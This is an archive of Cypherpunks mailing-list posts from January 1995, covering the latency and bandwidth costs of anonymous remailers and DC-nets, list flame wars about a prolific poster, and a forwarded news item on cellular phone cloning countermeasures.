Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 7 Jan 95 15:45:24 PST
To: cypherpunks@toad.com
Subject: Anonymity and cost
Message-ID: <199501072330.AA30350@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai writes:

> Anonymous e-mail that goes through a chain of N remailers will cost at
> least N times as much bandwidth and have N times as much latency as normal
> e-mail.  But e-mail is hardly the state-of-the-art of network
> communication, while anonymous e-mail IS the state of the art for
> anonymous communication.  How long will it take for the technology of
> anonymous video conferencing to develope, for example?  By then, of
> course, those who are not concerned with anonymity will probably have
> things such as full sensory virtual interaction. 

At a very basic level, anonymous (not pseudonymous, like the remailers
are) messages are *cheaper*, because they carry less information; they
do not need to send the bits which identify the sender. 

This conversation seems to elide distinctions between low-level
anonymity (where source information is simply not transmitted) and
high-level anonymity, where source information is transmitted but is
not used for social or political reasons.

Anonymous remailers are considered "anonymous" because (some of us)
agree that we won't treat the "From:" line as indicating the real
author of the text below. We agree this because we know how
remailers work; we know that (probably) the person who wrote the
message isn't the same person as the owner of the "From:" address.

When we say a message is "anonymous" we mean that its real author
should not/cannot be connected with the text of the message. We could
just as easily agree on an "Identify-Author:" header field by which
authors could indicate whether or not they wished to be speaking
"on the record" when they wrote the message. 

A multi-hop message where the "From:" line changes with each hop
costs almost precisely what a multi-hop message would cost without
the "From:" line changes. Folks feeling detail-oriented can calculate
the cost of the CPU time to strip header information vs. the cost of
sending that header information to the next hop. I don't care about
the answer, so I'm not going to.

Anonymous video conferencing is available now; go to Kinko's, pay
cash for the use of their video conference room. Or, ask/convince
the recipient to consider the conversation "off the record". 

Current remailer operators experience a cost in that they 
receive some amount of hassle and exposure to liability by
running remailers; but this is merely a "cost" shifted from one
person (the author) to another, the surrogate author. This may
look like a cost of anonymity but it's more accurately 
described as the cost of being provocative or rude or illegal.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw8j133YhjZY3fMNAQGB5QP9HCgA2QiHLPVupVgOeU/Tez5SH8Ie3ch3
nSJreSYl3a97blPr/aI1Yx577EQuCwrHoyZKWWpVc/8u728i10gTbJPbavzpDBOw
i3JawSt4+d/tMWBfLzYHzdrVALIcTZeGnmLLbfgzWzzC8NUDsDG/ppDB7sDq2ktf
NiwvDeQzoYk=
=oU42
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 15:38:25 PST
To: jsled@free.org (Josh Michael Sled)
Subject: Don't Say Anything More in Public!
In-Reply-To: <199501072319.RAA03833@squeaky.free.org>
Message-ID: <199501072338.PAA04770@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Josh Michael Sled wrote:
...
> The idea of the Chinese Lottery seemed to be rather far fetched in my
> first few readings, but then I came across the discussion of the new
> Emergency Broadcast System.
> 
> This may just be an unfair helping of paranoia, but the system seems
> to be a  perfect distribution system for a Chinese Lottery-like
> keychecking or cracking system. Even though the public can turn off the
> broadcast, the signal will still be sent.  The chips may even be
> government-regulated... available only from the government so no one can
> tamper with the signal and use this system for their  own
> information-disemination needs (*ahem* Political agendas *ahem*
> re-election  ads).  They might even encrypt the signals, for a touch of
> irony.  Anyone find fault in this?

Josh, I'm sending this note to you privately--please don't comment
anymore in public on this! You could be undermining national
insecurity by revealing this system!

More than just key-crackers are included in the Emergency Broadcast
System boxes. In addition, the red LED acts just as the LEDs on cable
set-top boxes act, namely, as an infrared sensor. These LEDs can count
the numbers of citizen-units in the same room as the unit, and can of
course even detect the thermal signature of drug abuser (flushed skin,
dilated eyes, etc.).

The key-cracking functions are only incidental. In fact, they may not
even be cost-effective. I was told last year by the NSA's A.U.N.T.I.E.
(Authorization Unit for Non-Terminal Industrial Enterprises)
group that the real key-cracking crunch is contained in the *Clipper*
phones, which of course have crypto modules and can do all the right
calculations. 

They can also occasionally dial the Clipper phone ("Sorry, wrong
number.") and check on the progress of calculations. Mysterious phone
calls in the middle of the night should rightly worry folks--it may
mean your number's up.

But don't discuss this on the list! If you do, she'll have us killed.
(And don't call her Dotty!)

--Klaus! von Future Prime, being channelled by Carol
Moore^H^H^H^H^HAnne Braddock





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 16:18:40 PST
To: greg@ideath.goldenbear.com (Greg Broiles)
Subject: Re: Anonymity and cost
In-Reply-To: <199501072330.AA30350@ideath.goldenbear.com>
Message-ID: <199501080018.QAA11241@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:

> At a very basic level, anonymous (not pseudonymous, like the remailers
> are) messages are *cheaper*, because they carry less information; they
> do not need to send the bits which identify the sender. 

I think the meaning of "anonymous" here is clearly with respect to
_traffic analysis_. The "cost of anonymity" is with respect to the
costs and delays of using digital mixes (remailers)). The relatively
few bytes of header information don't affect the cost in any
substantive way.

> This conversation seems to elide distinctions between low-level
> anonymity (where source information is simply not transmitted) and
> high-level anonymity, where source information is transmitted but is
> not used for social or political reasons.

Again, traffic analysis is the issue. (And I don't necessarily mean
NSA-type traffic analysis...Net-savvy investigators can trace messages
back to origins even when a message is ostensibly anonymous. So far as
I know, some form of mix/remailer is needed to ensure anonymity.))0

> A multi-hop message where the "From:" line changes with each hop
> costs almost precisely what a multi-hop message would cost without
> the "From:" line changes. Folks feeling detail-oriented can calculate
> the cost of the CPU time to strip header information vs. the cost of
> sending that header information to the next hop. I don't care about
> the answer, so I'm not going to.

??? 

This is not the "cost" that is being discussed. Stripping or changing
headers is a trivial cost compared to the latency delays that may
result when mix reordering is done (how much latency is involved is a
function of several things, including reordering desired ("N"), amount
of other traffic).

> Anonymous video conferencing is available now; go to Kinko's, pay
> cash for the use of their video conference room. Or, ask/convince
> the recipient to consider the conversation "off the record". 

Neither of these kinds of "anonymity" are cryptographically
interesting, or strong.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 16:37:54 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <199501072258.OAA28744@netcom4.netcom.com>
Message-ID: <Pine.SUN.3.91.950107160532.8939C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Timothy C. May wrote:

> The tradeoffs are best analyzed with an actual mathematical model of
> nodes, traffic rates, clumping of traffic, etc., rather than our
> hand-waving here (hand-waving is OK for broad conceptual points, but
> not in cases like this).

Are there any theoritical tools developed especially for this type 
of analysis?  If so, can anyone provide some references?

> I'll be interested in what others calculate, but I think "conversation
> mixes" are several years off, at best. The upcoming demo of Voice PGP
> by Phil Zimmermann (scheduled to appear at the Demo Day meeting next
> Saturday) may be a step in this direction.

Secrecy will of course have to come before anonymity.  I am eagerly 
awaiting Voice PGP, but unfortuanately can't make the Demo Day meeting.  
Will someone please report the highlights?

> In other words, there are economic as well as technologic reasons I
> doubt we'll see low-latency, high-bandwidth audio or video remailers
> anytime soon. (As we're seeing now: short messages can get through in
> tens of seconds, 

So, the situation: high-latency, low-bandwidth e-mail remailers
the goal: low-latency, high-bandwidth interactive A/V type anonymity, but 
this seems too far away

Perhaps we can tackle the problems of latency and bandwidth seperately.  
That is, develop 2 sets of anonymity tools:
1. low-latency, low-bandwidth, for use in textual interactions such as MUD 
and IRC
2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps 
anonymous TV broadcasting

I'm not too familiar with DC-nets, but they can probably be used as 
tool set #1. (correct me if i'm wrong) How about tool set number 2?

> My suspicion is that Alice and Bob cannot defeat traffic analysis
> while ~10K bits per second are flowing continuously between them
> (audio), at least not until _many_ subnetworks are _much_
> faster. Also, the CPU loads would be great (= costly)). Video is even
> further off. Tricks to reduce bandwidth may help.

Indeed, Vinge makes use of such a trick in True Names.  If I remember 
correctly, the technology in the story includes the ability to compress 
full virtualy reality type interactions down to a few hundred bytes per 
second! (maybe is was thousands, but either way it seems unlikely) 
Vinge seems to be a stronger believer of compression.  There is a
similar technology in A Fire Upon the Deep.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Sat, 7 Jan 95 14:57:34 PST
To: Carol Anne Braddock <carolann@mm.com>
Subject: Re: Killfiles 101
In-Reply-To: <Pine.3.89.9501070625.I14788-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501071651.A8927-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Carol Anne Braddock wrote:

all responses and replys and nosensical remarks to this post can be taken 
off the cypherpunks list and directed to me carol, or whomever decides to 
respond, unless of course something productive pops out of it.

> 
> 1. The best and only way you can be sure you're 
>    killing a file is to turn your machine off.
>    Only then can you be sure it is dead.
> 
wow, she knows about puns, cool.

> 2. If you must resort to using killfiles,
>    (great marketer trick, make you use it 
>    again and again, and again, like a gun)
>    kill "classes" of files, as opposed to
>    individuals, you'll get better kill ratio.
>    A good example is anon or wizvax users.
> 
class of users are to vague and I fear I may kill something I want to 
read.  I have never came toa a point where i knew all posts from such and 
site site or class of users was not worth my time, but I have run across 
dozens of individuals who I realized said nothing I wanted to waste a "d" 
or "n" keystroke on.

> 3. Note: Killfiles are a censor's best friend!
>    And you'll become what you swore you wouldn't.
> 
Bullshit, you sound like Doctress fuckin Nuetopia.  Kill files are not 
censorship at all, do you pay attention to everythign that coems your 
way?  Do you read every last scrap of paper people put in front of you?  
Do you go out and buy every fuckin perdiodical just in case there is an 
article in them you want, or are you intelligent enough to make 
judgemnets to conserve your time and sanity by not wasting your time on 
information resources you know will bring nothing too you.  If I really 
wanted to censr or kill you Carol, and not simply avoid having to "d" 
thru a good thrity messages I don't want to read, you wouldn't be 
replying to this at all dear.

> does your signature tell the truth nesta? Can't know everything 
> with a killfile! Eventually you'll kill the file that'd get you sex.

So far your posts have told me nothing I didnt already know.  Damn Carol, 
I was on your side until you started to REALLY SPAM.


i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 17:00:48 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <Pine.SUN.3.91.950107160532.8939C-100000@eskimo.com>
Message-ID: <199501080059.QAA19944@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:
...
> Are there any theoritical tools developed especially for this type 
> of analysis?  If so, can anyone provide some references?

No, this is too small a community for such tools to exist
off-the-shelf. Start with the standard mix papers, mentioned here
often. Also, Hal Finney made a first stab at a more careful
calculation of just how well remailer's do their job...this was about
half a year ago, as I recall.

> So, the situation: high-latency, low-bandwidth e-mail remailers
> the goal: low-latency, high-bandwidth interactive A/V type anonymity, but 
> this seems too far away

The goal for whom? I find IRC a waste of time, so "anonymous
audivisual" is not even on my radar screen of things of interest. I
think it's >10 years off.

> Perhaps we can tackle the problems of latency and bandwidth seperately.  
> That is, develop 2 sets of anonymity tools:
> 1. low-latency, low-bandwidth, for use in textual interactions such as MUD 
> and IRC
> 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps 
> anonymous TV broadcasting

Think market. I don't see anyone paying for this until costs drop
dramatically.


--Tim May



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 17:08:42 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Latency Costs of Anonymity
In-Reply-To: <199501072300.PAA25794@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950107164103.8939E-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Hal wrote:

> This technology does sound like mixing could work pretty well to provide
> anonymity.  There is some price in bandwidth and latency but ATM is so
> fast that probably several steps of chaining and mixing would be
> possible.  Naturally such mixes would have to be hardware based due to the
> rapid speeds of the packets.  So this would be kind of a "souped up"
> version of our current email remailer network, with vastly greater
> bandwidths and switching speeds.

The problem here is that you'll have to do a RSA operation on EACH 
packet.  Pretty hard on the CPU...

> I think it may be more useful rather than speaking of "true" anonymity
> to think of factor-of-N anonymity.  This reflects the bandwidth costs.  I
> would guess that, if you have a packet-based video converencing system,
> that today you could probably get factor-of-2 anonymity with custom
> hardware, and perhaps even more than that.

I'm not exactly sure what you mean by "factor-of-N".  I only used "true" 
to distiguish it from "trivial" anonymity (such as using a pay phone).  
Of course, anonymity, like security, can only be relative.

> One other point I would make, based on Wei's original post, is that no
> doubt anonymity does exact some costs.  However this does not mean that
> it is uncompetitive.  It also may have, in some circumstances,
> advantages.  People may be more frank and critical when they are shielded
> by anonymity.  I've read articles about companies which introduce
> electornic "suggestion boxes" where people can post anonymously, and
> upper management is often shocked at the results.  It is too early to
> judge how much of a net benefit or harm anonymity will be in general.
> 
> Furthermore, it is likely that the net advantage will differ depending on
> the business or organization.  At one extreme, a group working with
> illegal or restricted technology would probably benefit more from
> anonymity.  I think it was Keith Henson who posted a story here a couple
> of years ago that he was working on, involving some kind of underground
> protest group which organized itself using crypto anonymity.  So it is
> really not a question of whether anonymity is good or bad, but rather
> whether its costs outweigh its advantages in a particular situation.

This is all very true.  I guess I'm just lamenting the loss of my ealier,
more naive dream that one day everyone will be anonymous (read
pseudonymous), and that physical and digital identities will be totally
seperate. 

Wei Dai
Who should really start signing his posts but left his key in another 
computer.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsled@free.org (Josh Michael Sled)
Date: Sat, 7 Jan 95 14:59:43 PST
To: cypherpunks@toad.com
Subject: Chinese EBS
Message-ID: <199501072319.RAA03833@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've been reading through "Applied Cryptography," as every good boy
and girl should :) and one of the concepts struck out at me recently. 
The idea of the Chinese Lottery seemed to be rather far fetched in my
first few readings, but then I came across the discussion of the new
Emergency Broadcast System.

This may just be an unfair helping of paranoia, but the system seems
to be a  perfect distribution system for a Chinese Lottery-like
keychecking or cracking system. Even though the public can turn off the
broadcast, the signal will still be sent.  The chips may even be
government-regulated... available only from the government so no one can
tamper with the signal and use this system for their  own
information-disemination needs (*ahem* Political agendas *ahem*
re-election  ads).  They might even encrypt the signals, for a touch of
irony.  Anyone find fault in this?

- -Joshua M. Sled <jsled@ctp.org/jsled@free.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLw3WJqTT29daLBKRAQFbRgP/RAhGdEmxMe4zOuLORY9rKu7VhapXen7S
6+cVOvrlOxJ2ohCmxZpXbwKY9oR6ggF1jURwb9LZEiHPfzaOOsftURxcmJUsC2db
1vkSRuBarkm6vOK+JIlLMwKzRdk9omt+TmJPD7/wI5M1jhMfLRNS+fkbEpDFtisn
0s1H2nvXdDs=
=kGbJ
-----END PGP SIGNATURE-----

---
  KWQ/2 1.2g NR  "MTV get off the air!" - DKs
                                                                                                       




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Sat, 7 Jan 95 15:53:56 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: The first reply came 3 days later.
In-Reply-To: <Pine.3.89.9501070243.B14788-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501071725.D8927-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



From my present calcuations approximately 14 percent of my mail for the 
last two days has been form Carol Ann, this is not a small feat 
co9nsidering the amount of mailing I usually recieve.
Perhaps if Carol would post a well thoguth out and written article on 
what happened, instead of posting a thousand little "me toos" and "told 
ya so's" and such, this wouldn't be so annoying.  rough estimate of mine 
is that she is repsonsible for 30 some percent of the traffic on 
cypherpunks at this time.

Worse par tis that because i recieve my mail thru a SLIP lin which is 
admittedly slow, I still have to recieve all noise messages thru my SLIP 
link before procmail can trash/delete/redirect them.  SO now taking this 
into consideration, it seems that Carol Ann is responsible for more 
thruput on my SLIP link the myself, since mostly I recive mail thru it.  
It's a close call, me or Carol, that's counting in FTPs and WWW browing.  
I mean maybe I hsould charge her money now 8) 

i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an172607@anon.penet.fi (duquesne duke)
Date: Sat, 7 Jan 95 10:55:27 PST
To: cypherpunks@toad.com
Subject: cel fraud
Message-ID: <9501071759.AA00953@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Fighting Cellular Fraud, New York To Washington
BEDMINSTER, NEW JERSEY, U.S.A., 1995 JAN 6 (NB) -- Bell Atlantic Mobile (BAM,
parent NYSE:BEL) and NYNEX Mobile Communications (parent NYSE:NYN), two large
US cellular phone carriers, are about to block automatic "roaming" service in
New York City and surrounding areas. Starting January 9, BAM customers who
place calls in the city will need to enter a personal identification number
(PIN) issued by BAM in order to complete the call.

The new policy is an antifraud measure to combat criminals who steal cellular
service, BAM said. The PIN system was developed by NYNEX and is in use inside
the City now, NYNEX sources said. Both firms emphasized that the new policy
is no magic wand to do away with cellular fraud. However, as a BAM
spokesperson told Newsbytes, the combination of restricted roaming and PIN
numbers will "raise the bar again" where cellular fraud is concerned.

Under the new system, the two cellular carriers will restrict calls in the
greater NYC area by roaming customers from a "Fraud Protection Zone" that
includes Washington, D.C.; Baltimore; Pittsburgh; and greater Philadelphia,
including Delaware and southern New Jersey.

BAM adopted the new measures because of increasing problems with cloning, in
which a criminal picks off a cellular customer's automated phone IDs during a
legitimate call and uses them to make a "clone phone." The cloned phone can
be used to make calls for which the legitimate customers, not the cloners,
are billed.

AT&T's Steve Fleischer, speaking to Newsbytes, said such cloning operations
have become such a successful criminal industry that some criminals sell the
phones with 30-day guarantees.

"If a number is cut off, you can bring it back to the cellular bandits and
have it reprogrammed for no additional charge," he explained. "It costs the
carriers around $1 million a day."

He paused, then added: "It just shows how big a demand there is for wireless
communications."

Under the new policy, customers from inside the protected zone who want to
use their phones at standard "roaming" rates in New York City must first
contact BAM by dialing 211 from their cellular phone. After they provide
proper identification and select a PIN code, the company deactivates the
fraud zone lock-out.

NYNEX spokesperson Kim Ancin told Newsbytes that customers with PIN numbers
place calls as much usual by dialing the destination number and pressing the
Send button. However, on protected phones, the customer then punches in the
PIN number and presses Send again.

Ancin explained that the PIN number goes out on a frequency different from
the initial send. Cellular bandits use special equipment to pick up a
legitimate phone's mobile identification number (MIN) and electronic serial
number (ESN), which until now have been enough to clone a phone. However, she
said, adding a PIN number on a second frequency makes cloning much more
difficult.

BAM said it would not activate the fraud protection lock-out in northern New
Jersey, where calls to New York City are local calls. However, since
customers who travel frequently into the city are at risk from cloning, the
firm strongly recommended that northern New Jersey customers sign up for a
PIN. Eventually, the firm said, all new customers will be required to select
PINs.

BAM said if a bandit does succeed in cloning a PIN-equipped phone, a customer
can simply change the PIN number. Customers without PIN numbers must bring
their phones back to a carrier or dealer to install a new phone number,
notify business associates and friends of the number change, and modify
business cards and stationery.

There is no extra charge for PIN numbers, which are implemented by software
at the carrier's switch, BAM's Fleischer told Newsbytes. The feature will not
affect commonly used cellular services like voice mail or call waiting. Calls
to 911, 611 and 411 will not require a PIN.

(Craig Menefee/19950106/Press Contact: Steve Fleischer, 908-306-7539 or Brian
Wood, 908-306-7508, both of BAM; Kim Ancin, 914-365-7573, or Jim Gerace, 914-
365-7712, both of NYNEX)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 18:02:18 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <199501080059.QAA19944@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.91.950107171621.17000A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Timothy C. May wrote:

> > Perhaps we can tackle the problems of latency and bandwidth seperately.  
> > That is, develop 2 sets of anonymity tools:
> > 1. low-latency, low-bandwidth, for use in textual interactions such as MUD 
> > and IRC
> > 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps 
> > anonymous TV broadcasting
> 
> Think market. I don't see anyone paying for this until costs drop
> dramatically.

Oops, I didn't mean to exhort anyone to actually make the tools, but was
just thinking about the feasibilities.  (I know, "Cypherpunks write code",
not "Cypherpunks convince others to write code." ;) OTOH, I DO think
people with anonymity needs will pay for lower latency and/or higher
bandwidth (right now probably tool set #1 will have a greater demand,
given the heavy use of MUDs and IRC). 

In the longer term, anonymous communication is in danger of being used
only by fringe groups if it falls too much behind the non-anonymous kind
in terms of latency and bandwidth (and cost, I guess).  Maybe ONLY drug
dealers, nuclear terrorists, etc., will use anonymous remailers when full
sensory virtual interaction is the must popular way for most people to
communicate and remailers are still the only choice for the
anonymity-conscious.  By then, the remailers themselves will be in
danger of being outlawed, or just close down for lack of business.

> I find IRC a waste of time, so "anonymous audivisual" is not even on my
> radar screen of things of interest. I think it's >10 years off. 

I think limited virtual interaction can be available on the Internet in 5 
years (in prototype), so I sure hope anonymous A/V is not that far off.

I know, I know, the market will decide...  But second guessing the market 
can be fun and sometimes profitable.  Just look at all those people 
trying to make money on the stock market.

Sorry if I'm hammering the subject to death...

Wei Dai







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 7 Jan 95 18:40:47 PST
To: cypherpunks@toad.com
Subject: Re: Latency Costs of Anonymity
Message-ID: <199501080241.SAA13329@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Wei Dai <weidai@eskimo.com>
> [My idea for ATM mixes]
> The problem here is that you'll have to do a RSA operation on EACH 
> packet.  Pretty hard on the CPU...

Yes, good point.  It might be possible to use a stream model where the
separate packets which make up a stream use the same conventional key.
This allows the various packets which make up a stream to be identified
as such by outsiders, but still if there are a large number of virtual
streams going through the network at one time it should be possible to
confuse the streams pretty well.  ("I've got a crazy idea.  Let's cross
the streams!" -- Ghostbusters).  Then you only need to do the RSA work
at setup time, and you need a fast streaming cypher during the
conversation.  This is how the streaming-packet encryption models like
IPSP or Netscape's SSL seem to work.

> > I think it may be more useful rather than speaking of "true" anonymity
> > to think of factor-of-N anonymity.  This reflects the bandwidth costs.  I
> > would guess that, if you have a packet-based video converencing system,
> > that today you could probably get factor-of-2 anonymity with custom
> > hardware, and perhaps even more than that.
> 
> I'm not exactly sure what you mean by "factor-of-N".  I only used "true" 
> to distiguish it from "trivial" anonymity (such as using a pay phone).  
> Of course, anonymity, like security, can only be relative.

By "factor-of-N" I meant anonymity where you can only pin the source of
a message down to one of N possibilities.  It appears to me that many
of the costs will be a function of N.  It will be relatively easier to
cloak your source as one of say 50 possibilities than to make it any of
one in a million.  This is why I suggested that factor-of-2 anonymity
would be the easiest.  The DC-Net concept would allow two users to
share a cryptographically strong pseudo-random stream, and each of them
to XOR their video output with the random stream; then these modified
outputs from each of them are themselves XOR'd together to produce the
joint output.  As long as only one sends at a time, the resulting
stream is their output, but it is impossible for an outsider to
determine which one is sending.  The hardware requirements seem quite
modest and perhaps would be adequate today even for video.

> [My points about limitations on suitability of anonymity]
> 
> This is all very true.  I guess I'm just lamenting the loss of my ealier,
> more naive dream that one day everyone will be anonymous (read
> pseudonymous), and that physical and digital identities will be totally
> seperate. 

I don't think we would really expect everyone to be anonymous all of the
time.  In our personal lives, with friends and family, it doesn't seem
appropriate to expect anonymity (although my earlier quotes from Greg
Bear's sci fi story suggest differently).  But still I think that for
people who desire it and are willing to pay the prices, anonymity would
indeed be available in many or most electronic communications.  So if
that is your desire you should be able to achieve it.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLw9Q1xnMLJtOy9MBAQEhPwH+KSYD4KhA1HOUxqOzdb2WdMuq0i1XTFzH
fKMnejTqlKVbFfEnQqfHukwKpH5nFpuN7towJ1o98aGqT1ACxbSjpQ==
=2mxw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: klp@epx.cis.umn.edu
Date: Sat, 7 Jan 95 17:50:26 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Carol Anne Whoever
In-Reply-To: <ab33c51401021004a87a@[132.162.201.201]>
Message-ID: <0012f0f4513022117@epx.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to legend, Jonathan Rochkind said:
> [I'm beginning to suspect that Carol Anne, and her sysadmin too, are just
> tentacles of Detweiler.]
Actually (unfortunatly?) I can confirm the fact that Carol Anne, and
Mike are >not< Detweiler, CA by personally knowledge, and Mike by
reputation. Just thought I'd toss that out for the viewing public,
and go back to my 'no comment' stance on the whole rest of the 
deal...

-- 
Kevin Prigge                         internet: klp@epx.cis.umn.edu
CIS Consultant                      MaBellNet: (612)626-0001
Computer & Information Services    SneakerNet: 152 Lauderdale




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sat, 7 Jan 95 19:44:19 PST
To: m00012@KANGA.STCLOUD.MSUS.EDU
Subject: Re: carrol(
In-Reply-To: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU>
Message-ID: <199501080230.UAA00614@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> What is wrong with this person?
> 
> ban her if you can, that's my opnion.
> 
Hi all,

For what it is worth, I oppose banning in any manner, shape, or form. There
is no morale or ethical justification for it.

Take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@izanagi.sbi.com>
Date: Sat, 7 Jan 95 03:58:33 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.SUN.3.91.950107205847.20579A-100000@doe174g>
MIME-Version: 1.0
Content-Type: text/plain


who cypherpunks
end





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Fletcher <jonathon@izanagi.sbi.com>
Date: Sat, 7 Jan 95 04:26:04 PST
To: cypherpunks@toad.com
Subject: Re: your mail
Message-ID: <Pine.SUN.3.91.950107212620.20579H-100000@doe174g>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Jonathon Fletcher wrote:
> who cypherpunks
> end

I know, I know. I'm sorry. I'll send it to the right place next time.
Small slip of the qwertys

-Jon

--
  Jonathon Fletcher,
  jonathon@japan.sbi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Sat, 7 Jan 95 19:30:25 PST
To: cypherpunks@toad.com
Subject: carrol(
Message-ID: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain



What is wrong with this person?

ban her if you can, that's my opnion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Sat, 7 Jan 95 14:09:35 PST
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
Message-ID: <1995Jan7.134217.22470@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com> sandfort@crl.com (Sandy Sandfort) writes:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>C'punks,
>
>Here is a guest editorial that ran in Monday's SF Chronicle.  It
>should make your blood boil.

Is anyone going to write rebuttals?  Would the SF Chronicle print them?  As
I read this, I only saw the following propaganda:

>             ANARCHY, CHAOS ON THE INTERNET MUST END

in Cyberspace, there is not much order. It is governed by no one.
... being left to the equivalent of mob rule.
the need for firm direction is all too obvious.
